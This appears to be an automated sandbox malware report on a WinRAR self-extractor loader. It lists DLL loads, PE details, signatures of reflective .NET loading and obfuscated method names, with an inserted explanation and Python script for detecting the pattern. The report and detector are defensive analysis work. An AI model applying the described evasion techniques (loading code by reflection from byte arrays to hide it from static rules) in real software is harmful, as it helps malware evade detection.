Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: iphlpapi.dll
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: loader.exeStatic file information: File size 2040097 > 1048576
        Source: loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: loader.exe
        Source: loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

Source: 0.3.loader.exe.6988fc4.0.raw.unpack, e12nGA4j2K57ImO696x.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, e12nGA4j2K57ImO696x.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, MUGdx8mv9tRbKvyDKpX.cs | .Net Code: l7rP8nYagQ System.AppDomain.Load(byte[])
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, MUGdx8mv9tRbKvyDKpX.cs | .Net Code: l7rP8nYagQ System.Reflection.Assembly.Load(byte[])
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, MUGdx8mv9tRbKvyDKpX.cs | .Net Code: l7rP8nYagQ
Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, MUGdx8mv9tRbKvyDKpX.cs | .Net Code: l7rP8nYagQ System.AppDomain.Load(byte[])
Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, MUGdx8mv9tRbKvyDKpX.cs | .Net Code: l7rP8nYagQ System.Reflection.Assembly.Load(byte[])
Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, MUGdx8mv9tRbKvyDKpX.cs | .Net Code: l7rP8nYagQ
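The signatures above describe a reflective-invocation pattern: the unpacked .NET stage resolves Marshal.GetDelegateForFunctionPointer by name through GetMethod instead of calling it directly, and loads the next stage from a byte array with Assembly.Load / AppDomain.Load, so neither the native call nor the payload module appears as an ordinary reference in the assembly's metadata. This matters for anyone writing static rules: in a .NET assembly, identifiers that are referenced directly are stored null-terminated in UTF-8 in the #Strings heap, whereas a name passed to GetMethod as a string literal is stored UTF-16LE in the #US (user string) heap. A rule that searches only for the UTF-8 API name therefore misses exactly this case. The following Python is an added example, not code from the sample or from Joe Sandbox: it scans raw bytes for a handful of indicator names in both encodings and applies a simple decision rule. The indicator list, the rule, and the sample metadata blob are assumptions constructed for the example.

```python
# Indicator names to look for; this list is an assumption, extend it for your own rules.
INDICATORS = ("GetDelegateForFunctionPointer", "GetMethod", "Invoke", "Load", "Assembly", "AppDomain")


def find_indicators(data: bytes, indicators=INDICATORS) -> dict:
    """Map each indicator found in `data` to the encodings it was found in.

    'utf-8'    : null-delimited, as a MemberRef/TypeRef/method name in the #Strings heap,
                 i.e. a direct reference that shows up in ordinary metadata listings.
    'utf-16le' : as a user-string literal in the #US heap, i.e. a name that is only
                 resolved at runtime through GetMethod/GetType and hidden from those listings.
    """
    hits = {}
    for name in indicators:
        encodings = []
        # #Strings begins with an empty string and every entry is null-terminated,
        # so a real identifier is always bracketed by null bytes.
        if b"\x00" + name.encode("utf-8") + b"\x00" in data:
            encodings.append("utf-8")
        if name.encode("utf-16-le") in data:
            encodings.append("utf-16le")
        if encodings:
            hits[name] = encodings
    return hits


def reflective_invocation_suspected(hits: dict) -> bool:
    """Decision rule (an assumption): the native-call API name exists only as a UTF-16 literal
    while GetMethod is referenced directly, which is the report's pattern."""
    return (hits.get("GetDelegateForFunctionPointer") == ["utf-16le"]
            and "utf-8" in hits.get("GetMethod", []))


def _us_literal(text: str) -> bytes:
    """A #US heap entry as it sits on disk: compressed length prefix, UTF-16LE body, trailing
    flag byte. Single-byte length form, so only valid for literals under 64 characters."""
    body = text.encode("utf-16-le")
    return bytes([len(body) + 1]) + body + b"\x00"


# Constructed stand-in for a metadata blob (a #Strings-like run of identifiers followed by one
# #US-like literal). These are not bytes from the analysed sample.
SAMPLE_METADATA = (
    b"\x00" + b"\x00".join([b"Marshal", b"GetMethod", b"Invoke", b"Assembly", b"Load"]) + b"\x00"
    + _us_literal("GetDelegateForFunctionPointer")
)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_METADATA
    found = find_indicators(blob)
    for name, encodings in found.items():
        print(f"{name}: {', '.join(encodings)}")
    print("reflective invocation suspected:", reflective_invocation_suspected(found))
```

Run it against an unpacked .NET stage (for example the raw memory dump the report names) by passing the file path; with no argument it scans the constructed blob. Because the scan is byte-oriented it works on memory dumps as well as files on disk, which is where the sample's real strings are visible after the unpacking step.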
Source: C:\Users\user\Desktop\loader.exe | File created: C:\blockcomwinsavescrt\__tmp_rar_sfx_access_check_5466078
Source: loader.exe | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0011E28C push eax; ret 0_2_0011E2AA
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0011CAC9 push eax; retf 0011h 0_2_0011CACE
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0011ED46 push ecx; ret 0_2_0011ED59
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Code function: 4_2_00007FFD9B9E96AD push es; retf 4_2_00007FFD9B9E96AE
Source: containercomponentSaves.exe.0.dr | Static PE information: section name: .text entropy: 7.220844092884831
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, bUytRpH2ket5ubfKtT6.cs | High entropy of concatenated method names: 'CQcTCBL1y1', 'DnqTB7fOwE', 'C35TJyy4et', 'O8XTYV5W4A', 'sUSTI2DC3a', 'v55TEkjRup', 'lV13xYVjUeCP4a4ImNg', 'eFbaCSVkqlkPEnVx4O5', 'x0pqBXVxFJySBEE5nUP', 'gKMB2VVrLw6f2UYjv6R'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, elCwswbtMBqseIwgfHR.cs | High entropy of concatenated method names: 'ffGm3l9ZuX', 'eB5maZyUVf', 'CPqU5k8HEBFSQ0GjXBI', 'zlAYDG8wlXATVs23tny', 'eP788o886q53k0JD89n', 'xgWgbS87TdJW7BekDTw', 'pFs1jJ8nEi8SJDGChIj', 'GCVDt08isApOBciG50I', 'DYKc8U8AvTenpJocy9r', 'MU89L48WMCqZOZl29aR'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, n6UdyhOPV5QHSu7lkW.cs | High entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'F4FWkFXIK', 'klKAfuO4NIpQi0X4UQf', 'bvejhrOuKPmQXcknlMS', 'gaJhYmOmE6cG2JH39Kg', 'p0G1hnOJaOOoStxOUBg', 'FD3k7MONoYT7Pdtp4cm'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, iFLhSTby7W9nScAu0hw.cs | High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'OOa2i0Fvnl6ta26HedU', 'MCmTnHFVEbJNoVhaHy5', 'NcII8kF3VZWR5kQ0FXF', 'u5KaaBFSKJpCUvccooh', 'iiHEfOFgea5ef1H6TfT', 'BAYw2uFDlNOn7jjLUUS'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, BorSuEmfMjxPc3CDwgG.cs | High entropy of concatenated method names: 'Hou4XrHxOQ', 'UTjtSNaPBlsYnRy7mm8', 'bg5mGUajPI8UsQQhX51', 'i1fDRGarCvESdhW7AdP', 'sU444ZabPO8FiZqUni1', 'jboGy8apdoIWdsIeUC4', 'vam4FXj7YH', 'gcR4ipTVoi', 'vop451XbYo', 'gDg4dBjy46'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, JFNb1eHJOBjchb1Rkbk.cs | High entropy of concatenated method names: 'CdGXqjqpog', 'HsXXHiXt3a', 'lyaXUeOEvH', 'eMvX45vF7F', 'nOdXN0QgXU', 'SkXXvOpq5U', 'J0HXQqkPXt', 'uyCX3NZjdV', 'SJbXaaV3wE', 'XiqXeSKZRX'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, jVI6cGPt3PqUquW7AGA.cs | High entropy of concatenated method names: 'oYo', '_1Z5', 'JUWmpvhcOj', 'hgdQqsug71', 'AsVmsTFAAD', 'bahCK9LnGEeouLDjjvY', 'CBAArPLiSQlQALY1XD6', 'ye6XloLASltsmPBVF9D', 'r0NfAeLWXpdLegu9ViI', 'dhwT0rLE0djIJ2utuMj'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, ECP0llPltu3lsBBZy5w.cs | High entropy of concatenated method names: '_5u9', 'kjxmKouuUu', 'Mx9Q62wKSD', 'JgWm1mlKBK', 'fmK7daN9TmVdGi3CEhR', 'lmoZRpNcokpactjJBtQ', 'Lfwa86N6nQIRoT37cVP', 'hdMAinNyEdEZEaUrjmK', 'hmYHxYNMLaYRiPiCvMa', 'SjhpFrNzfAygFNtC7Qc'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, tp4UaRgMmABNs48VZv.cs | High entropy of concatenated method names: 'MberJrpob', 't4aRaFXrk', 'rXox6u6s8', 'elJ89dZ3T4mXZT5iE57', 'al2J9XZvD5lrZqMvXlj', 'SIRDCkZVsnLR9C76eoj', 'wSvFcHZSxVDNW85xPVF', 'SPoDXZZgs5PBSjClq4b', 'XysuYeZDBlQx4Il5cEI', 'UCQ1mqZGxyAxprB7rmB'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, nHqrNBzYBmF9MmlblR.cs | High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'EFIqJbshs0u0paqfhZT', 'l07h1ms1M63KmQI5Mq4', 'agPFbrsqu5lUdj0nAEu', 'boP3sLss8WSuDL7vYCX', 'zK7PHis2vpcM7Sk2gba', 'y9eNKdsK3jsCAF5Fq6p'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, j7AUw5HPrJniQE1pSCA.cs | High entropy of concatenated method names: 'YbFn6toNgH2jS3SQlMO', 'idXOqZoLLEf7RBOxLWd', 'ARjTH9omQel6k1NMURM', 'wwPYKVoJaJHWLWvKQS7', 'uwj5TaQEwb', 'CBVqyToIP5WYOO9YhuE', 'tvUhjqo5DEIxJpC3DNB', 'PLxjPwoYC6boTDr2bQw', 'WDlqSuoRAIe4Z7brZYn', 'R9UJOUoT55IcK0XyyPi'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, MUGdx8mv9tRbKvyDKpX.cs | High entropy of concatenated method names: 'Lq0P2pdj86', 'DHsPKnGq6j', 'XhPPrWnTrR', 'OnmPRC4bXj', 'K1MPxm9qTA', 'UuhPSFJwIh', 'V6hPVJGs9u', 'joCPa7nY33jJv60H9EL', 'IjY5BenNEBY393b2ie1', 'pcaNGvnLv6BnpSYSAc5'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, CXh8AJBnSkcukmHWrg.cs | High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'r58G21qT9Y5ChJhmjun', 'dJebwQqQhgBwFgJNrQh', 'Fm1XrLqCUcFRSeMGj3V', 'VOUvaxqf6rdMQqgaFNd', 'riwTi6qtxJaMPDHNnMr', 'y4skYlqo2YD49xl422E'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, bFtTbMPBLI0wnGgYrcK.cs | High entropy of concatenated method names: '_269', '_5E7', 'SGImENanxd', 'Mz8', 'DYamxtrNN9', 'hClo6uLbDHDqTvbTOoC', 'TO50ecLpX96rXuTf6sx', 'LZm9GfLlJ69kwGx4DeZ', 'vWp653Ly0mXVHL0k5j2', 'XgPXC5LM0s0Pko4229O'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, FCH5FRK6EmZD6E8Flv.cs | High entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'J2SDbpHsg', 'Efl2IHOesLix9E22MSR', 'FycZdVOvyLH3bDAGb5N', 'dDTkwwOVlcehISOwwN0', 'JbnoaoO3O3yihJ7gQr6', 'dBp35XOSVOSGa8Uc1pY'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, A1akYtUK8MJXkN4vhbx.cs | High entropy of concatenated method names: 'A6G4HTX1cvLgj0oorKk', 'kxd1DkXq4rJGNdB22sc', 'W5kOWCXOw0OM1s6M3Wb', 'BALFp3Xh083KlyLsQ16', 'Oa2GrgGF2P', 'WM4', '_499', 'cIHGRijSq8', 'yrDGxR6WdH', 'Vj7GSUG8mu'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, s9Y2BEHrqJpZOZSGI5A.cs | High entropy of concatenated method names: 'IKQX6LbDhx', 'HGVkXwV9ZC6GXHW0rBR', 'eymmZlVydknACBTaLyL', 'Ih8B6xVMBx9AuQDKAH8', 'LyL4HCVcorLVtrxdg1o', 'bnMCe5V6E1NK7Q0fDjj', 'tkbvp9VzR2I0OoHAj3P'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, wQHF4Mm5uukMOApHvpf.cs | High entropy of concatenated method names: 'n8nqjDXBNo', 'L53q8aCs2j', 'PhErJ6AYBYtSrOQDMcA', 'hNEDSTAR67xAQ3Wtvow', 'CK5P8ZANiKDom7b4Hip', 'NtvbC6ALvYdBSeyXKWX', 'XqoUQjAIWHXBJ2D8Y87', 'PSEqo8A51KoyRIRrbGG', 'tDLFnDAT4WdAsU2Tlcl', 'kVFuTtAQp8acb3oYOUU'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, wksgOpbrVGle9jeAxPs.cs | High entropy of concatenated method names: 'CkmbBHWrgn', 'HdZwGIwYD89y13wF403', 'hmxUWfwRFjNAoJrLnPH', 'Ly2GUQwNomOEtmnW5w1', 'NA5InHwLfFvGTBJegeC', 'XfMmjRwI3o3vxbVDurV', 'QLw', 'YZ8', 'cC5', 'G9C'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, HAS1N5qdr3wOgLTRXnT.cs | High entropy of concatenated method names: 'KeGeKqJM5O', 'SWUervKywi', 'rtQeRqrWsO', 'bcGex99aMe', 'h8qeSra5hY', 'XbpSl3Ieimgy8QI1o5o', 'z7FoFIIv2v2I5MnvGfu', 'jWBjETIoVPXMZ5CDDUQ', 'GFJTLmIdvetX28Vs2EC', 'lQaXMfIVbDGrGByRF2M'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, vRdEDlPn8vha27TubKF.cs | High entropy of concatenated method names: 'uYyNk1ElHH', 'uN0N1E3FsZ', 'LN0N01TPmw', 'YJ1WN5mkawBOc2yQBUB', 'DlTXfwmxvncR6pFYmce', 'ccqOY7mjscgnJ9Qonj2', 'gSjfXDmrHuc65XBhCUX', 'g8h5DYmPlxOERCCgn4w', 'mJLonSmbIO50JdB29QT', 'LGsJtPmp8bHItZDYKgY'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, C1Kwxyb8rOWXASFsFSh.cs | High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'UcTCbL2SOMuT5lkDLLk', 'j96NhG2g2rgnxI2VWli', 'Fn2TUg2DvVPNApCLtkO', 'dTjxH22GC0PtfgskaJF', 'bCdHov2XY1tK54dO6YI', 'N5dItd2BRh87elW23Cy'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, e12nGA4j2K57ImO696x.cs | High entropy of concatenated method names: 'ei38a7kIhTl8vQgIvFS', 'SHyg6yk5QwjfX7y1OGf', 'DY1nhrkYlH9wWZOWZYI', 'krf55LkRn16eth5L5EE', 'DsOO8emQO3', 'RRvlRdkC72BUgMMlxJk', 'fCmVfokfHPPuZfyYOEo', 'Jy541CktndFMhLabHhy', 'uMRpVBkoL8ZM5ZCHSIw', 'joWygvkdrT2D3qhTnhn'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, QCfeZLboatOyyPr17xS.cs | High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'N8OBfdKeUvyDYFK5orx', 'bZAX7ZKv0cKrUnoi9bd', 'SR1wm9KVxGlb76JEP4a', 'FnvOyfK3wwcCNBejHjw', 'yVPbXaKSsB8gFxVxKiZ', 'DBDsh8KgHPbIgIorqkL'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, xbBULjmFkULeYUmGUcZ.cs | High entropy of concatenated method names: 'EgIPzNM8Kh', 'mPYq6wLB0t', 'SNJqbvWmfr', 'SSoqmIJMAP', 'bJ1qP6rTXU', 'raEqqnYGQ9', 'DPrqHe24xa', 'vmRqU62inj', 'Qn5q4DFqgH', 'vJqqNlFwIS'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, vwlNuPb3edRno2vaWGw.cs | High entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'BFCsiP24pF43i11lJeq', 'lSDRHH2uhctE7Y5ytWv', 'YfUxCZ2mfpBmdlfWxh3', 'uhj1Ub2JNMR1q7WHNTm', 'dARfuU2N9gdrrukEmPS', 'EOyb6p2LALv5rZVS1kH'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, xG0CAmbGlBQK1fwnGKN.cs | High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'KVwHDKK6Cnqc1fA6xwE', 'jtWif0KzedbaWDqkPXS', 'ecED9GF0sT8WwtR8uHy', 'JSUQLZFZI6vmBGra5fE', 'ogF4eiFOpGQOiKBSAWG', 'V6XEx3Fh0IiZQaKtU8k'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, AgoF7EbnOr49pcPxwU9.cs | High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'Fufo532pg4RvFkfNXFk', 'f7Lxud2lpO9eCnk6yDH', 'Rj9dyN2y2kq1CujxpLj', 'peQVcR2MKDN3q8TcdnX', 'njYH2729P0sPUCidywV', 'YhE1DR2cT1ifc6C9By2'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, jd0HwDlT8GxPKeMdEi.cs | High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'XyPqE21Uu6BeEfVO7bH', 'yHgHpH1ac6xvqlAkZj9', 'SX2yLh14kI4bigcACF8', 'QDNyxZ1us3HCmhBVC13', 'ogYnkO1mct5gqIsnker', 'rxJ1QX1J8KZ8n4kVXU9'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, JTO8SctOJmFB3go1oa.cs | High entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'urE3y21XdCqigMc35V9', 'CPGiSk1Bk5gxZFwhZRI', 'wk8BRm1k8qwJGEoEpW7', 'cVvxKC1xZcCVm4RuDDA', 'jrq7yN1jWYtOWn0ZOBP', 'xOlJBG1rQIZqZ9WJst5'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, Yt3a7Am8VijrPK9kO2G.cs | High entropy of concatenated method names: 'sBwPYWXI6r', 'xQ6dyGihFmCxCJQqmK6', 'uAxQvyi1ofcSFH2NtqY', 'R2a3KEiZwFl9IinAsSM', 'v0gG0riOqaUlZ9TwGkU', 'qRLOahiqsUBgZB135Uf', 'aXhvY9is7POkobNXaxu', 'Oqre2Li2LAB5DEqe7Zu', 'g0IWibiKKabeLPH8axT', 'G0tftbiFeM9CcS0a7Kn'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, wJ1dfEmp41vNSXt0yg3.cs | High entropy of concatenated method names: 'Ospqddj6sY', 'euXqs7vOQT', 'fVHqpoU3Vh', 'fdjqodby4Q', 'R9FqTVxoTl', 'FVTdCeW0jTYVTXOIi8H', 'Fdp9dgWZ1TLMVxBZPu3', 'brPtArA68m4hqTMxg7g', 'agrZrkAzhngwOPPrst1', 'utiUcXWOatEZxsVZRwO'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, kvrRbIbHsfU9Oh5es90.cs | High entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'kd2mhyskk8u4g8jderU', 'z5M5yasxM3djcbHPvi5', 'FSb3S6sjyuC79AifabV', 'EwhnxssrklsCosB83II', 'QoMOhTsPhZvGjoOYYXu', 'WEcuqgsbm7xMoFiO6Oa'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, FaxwEWbPU72abilU8M4.cs | High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'zlsBVXsCGvOaU056nSq', 'djj90jsfB0d6lhL1D5I', 'lhvNndstwMoQcBcRRoT', 'CW94OTsocMVxIA6ofKQ', 'wGmnVHsdZWAm3D5ntwu', 'gEpyhYse8lZPDSMnu7o'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, jLiTgrbvGArAJy852Vc.cs | High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'hMHrQq22VtiCNLMvxj8', 'ktOLwd2KHJ45drmeAPU', 'bKkZkV2FB1d9nyhuQgT', 'i2ZBMG2wkBFfhOPdOvq', 'BJ2iwH28dfTh84U5nVD', 'khRtMu2H7A6GGyYMrfK'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, PNaRg0PwwOu3q138Sha.cs | High entropy of concatenated method names: 'sg9', 'grcmlPHBiN', 'r6gvE9iljP', 'begm9GIhEg', 'okYqpfNjwXRpxMwX8ZC', 'jTD4rDNrokxx5HXGT1H', 'LcOa2ENPeyPu6oS1PNU', 'z1lMNtNk5CS1cuc9EOi', 'ChMqFANxDOMAV6BMNph', 'vphEa0NbZP9grSaqsMf'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, ceqVeGqY0y8eo7AOStU.cs | High entropy of concatenated method names: 'MWwcXHXN01', 'xOtcGADH7C', 'STjcj4Frpw', 'iWbc8UCM3c', 'PCnccTB4im', 'R89cndeH0O', 'b2kc9BsP5M', 'Vx8cLeTEiN', 'hyIcF31ZJZ', 'JKdci9a7Ma'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, lU8KOybsYAd686pdQsr.cs | High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'iSvNJIKY5QEdUVF23ev', 'WD0xKGKRmdevsTZuvq8', 'T02gTCKI6RkcLvhIaqP', 'DFJ46XK5RWj1JpHgL84', 'y0UvNjKTB7AHqHYice1', 'i6VmHTKQoVGwQby1X1q'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, I5MRP2pJ3TrvxJeUC7.cs | High entropy of concatenated method names: 'aPlTlj0re', 'VOwXq3eFh', 'P28gx1Ll8', 'xUVGqFO7A', 'T4M70248s', 'L7Fydu2EP', 'Rgthe84DA', 'ujNynUZKSJAHeuFxvTw', 'Fh0mekZFPteHCRLd6yf', 'CHyGsSZwBDfgIJ3cJTQ'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, XRvakYPisYbwnI0BclJ.cs | High entropy of concatenated method names: 'Ei6vcYaTxA', 'I1Nvn5r3wO', 'yLTv9RXnTL', 'dLOCf6JX0j9iuJG4MJ6', 'iv9BeKJDrOI4yCJRHbR', 'xWYujsJGeApA4CNxth4', 'AbJtZhJBOQJ7kFh8XHE', 'X2YvUQcOKj', 'j9rv4qcwn9', 'p0ZvNdSIrB'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, AgDAtpbSSmFmyiXsvFE.cs | High entropy of concatenated method names: 'z7VbEDC8V6', 'vmffNLwVQOloP4XuqoY', 'F8oF90w3RScTX9qNesT', 'DHgT3rweGjpKiKrCOYX', 'cnZoIbwvVoNONNuNDrH', 'Bg5pSgwSIY179Tq3m1J', '_3Xh', 'YZ8', '_123', 'G9C'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, vFBsjGPYXxna6swQVGV.cs | High entropy of concatenated method names: 'SJekxUYVbPoxpAIA8qg', 'BmjhBXY3cuq067d0baH', 'a6GnTdYewFgrjHvFKTK', 'hW1iOXYvkyE50FpcdX6', 'IWF', 'j72', 'D7uQ9nHouf', 'cIAQL8NK7q', 'j4z', 'hTuQF5o7ww'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, hpip68PkIL0HBLcli0C.cs | High entropy of concatenated method names: '_9YY', '_57I', 'w51', 'H4ZmfD2rxZ', '_168', 'kOmpR9LRmqji6LA8WjV', 'NJxynRLIcLb58Qf1UKb', 'Fm09xRL5XqxiBQTtWHY', 'igpGwZLTljJTxdb35Fv', 'QYGWwgLQCvlCgmDDMkd'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, sPtCV7myVk2T1Yrrjij.cs | High entropy of concatenated method names: 'M5NqE1OZS9', 'OIZqf61mq1', 'jTQqzHF4Mu', 'DkMH6OApHv', 'vfrHbc2pm0', 'xLRHm8sxMU', 'SDmHPkRsKp', 'AVpHqIbH4M', 'OtVHHaoJ1d', 'biTURSWyReGwKooKwJH'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, KwhRhAm9jP5F8UtPpkd.cs | High entropy of concatenated method names: 'SdXPE1XvGn', 'Qx8PfRkHlx', 'LnFsRZi4oSBItx4aMtt', 'uhYxx0iu2CW1jgP8qvw', 'x77uRJimdFZbeXAH97W', 'rBFZciiJLovgGehpSJu', 'Ln1h42iN1ptjuHLfWBA', 'EBcwLGiL5d4NyUOa8Mo', 's8CyoaiY7xSo35JW0Cp', 'r8b2EhiRFaNkf8dIPDV'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, rKNBkDbXbIyyge3NUG5.cs | High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'CZQlJ9KxHooP3Gs7OQ7', 'Ipy2mTKj3wcR6sLHneE', 'Fa2ycaKrv6RDHqkaOfo', 'EynjTyKPGQxDYRtJaYe', 'naTVGpKbhy2M0aeYmOZ', 'Cky1bpKpKDXj98DHFQL'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, e4v7dCHvGGCfEg4q6Qu.cs | High entropy of concatenated method names: 'wSNT50ABCY', 'a2bTdscxHI', 'uQsoD4vlZd99A8xBnuN', 'chkUTqvyrKPkgjvZsF1', 'YR8P3dvMbobpw7EtkB3', 'nAZ6Iyv9kEQmBTnk2Mn', 'R9ESy5vcPrxQHZ5JRFb', 'nmGvBpv6IW0kMot32ic', 'TUZgDCvzFDDn6c5B58d', 'Po8PphV0Y8fJhwXXOgX'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, qVPIauqGsI2TO9kMndF.cs | High entropy of concatenated method names: 'diGjKZIIpc', 'PnxjrrMPli', 'lyujRfFnHP', 'TT3jx0HtRb', 'tsyjSkDGmo', 'DJDAil54AiJ3AUK3vb6', 'Coc7eY5U5RT4eWWfLYP', 'fhB0tg5aRd0vq6pKCxr', 'XIGhIp5uyROjXPqwKfy', 'OoLOoe5mbpB55UvJHal'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, Gm0QbpwDKgUbRr6JTI.cs | High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'oJmhr918lTEgI1wv0sN', 'URSwBJ1Hy07CSJ7rdRU', 'PYhhcs1703oxJLtsgO6', 'fb4M5u1npt3W5L7yscM', 'BW8NTu1iALofyULSYlg', 'LQ90KT1AhyMfy8Eok83'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, CPWnTrbZRlnmC4bXjW1.cs | High entropy of concatenated method names: 'aw6mbaK7DY', 'Rc5mm9q0od', 'QGamPe0ngN', 'jwLljswb2Te2QABymn5', 'EXvNIJwpC4BfcHNhmc3', 'RSdxr7wr8B2b5xof7TD', 'x3PPqXwPKe5fXWW8AdX', 'PNGgyowlHq7vV40FMf9', 'rqS6uewyoTD2qI6Qkyb', 'v9yWMFwMG2VDI7rpgTt'
